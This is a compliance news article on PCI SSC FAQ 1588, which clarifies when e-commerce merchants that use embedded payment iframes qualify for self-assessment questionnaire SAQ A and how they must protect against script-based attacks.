The Payment Card Industry Security Standards Council Clarifies Self-Assessment Eligibility for E-commerce Merchants

According to an article by David Wright Tremaine, the Payment Card Industry Security Standards Council (PCI SSC) has issued FAQ 1588 to clarify the eligibility criteria for self-assessment questionnaire A (SAQ A). This self-assessment form allows eligible e-commerce merchants to streamline compliance with the Payment Card Industry Data Security Standard (PCI DSS). The guidance is particularly relevant to merchants outsourcing payment card processing to PCI DSS-compliant vendors through embedded payment pages, such as iframes.

SAQ A Compliance

The Payment Card Industry Security Standards Council provides 10 self-assessment questionnaires to help merchants and service providers demonstrate PCI DSS compliance efficiently. SAQ A applies to e-commerce merchants that fully outsource payment processing to a PCI DSS-compliant vendor. 

Eligible merchants must not store, process, or transmit cardholder data and must ensure all payment functions occur through a PCI DSS-compliant hosted e-commerce site, a webpage redirecting customers to a compliant vendor’s site for payment, or a webpage that embeds an iframe or similar element from a compliant vendor.

SAQ A does not apply to merchants handling in-person transactions via a point-of-sale system, and merchants with partial control over payment processing may require SAQ A-EP.

FAQ 1588 addresses a critical eligibility requirement: merchants must confirm their site is not susceptible to script-based attacks. The FAQ applies to SAQ A under PCI DSS v4.0.1 (effective April 2025) but is also relevant to earlier versions. It clarifies that this requirement only applies to merchants using embedded iframes or similar elements but not to those fully redirecting customers to third-party payment pages.

To meet this requirement, affected merchants must:

Implement PCI DSS-defined techniques to prevent unauthorized scripts, such as script whitelisting and integrity monitoring, or obtain confirmation from their PCI DSS-compliant vendor that embedded elements include protections against script attacks and that the merchant has implemented them correctly.

Merchants should note that payment card networks determine whether they can use SAQ A based on transaction volumes and other factors. Additionally, those who do not fully outsource payment processing may need to use SAQ A-EP, which includes further security requirements for protecting their website.

Takeaways for Risk and Compliance Professionals

Compliance teams must ensure merchants using SAQ A properly assess their script security risks and obtain necessary vendor confirmations. Organizations should review PCI DSS v4.0.1 updates and payment network requirements to determine the most appropriate compliance approach. As regulatory expectations evolve, proactive assessment of third-party payment integrations is essential to maintaining compliance and minimizing security risks.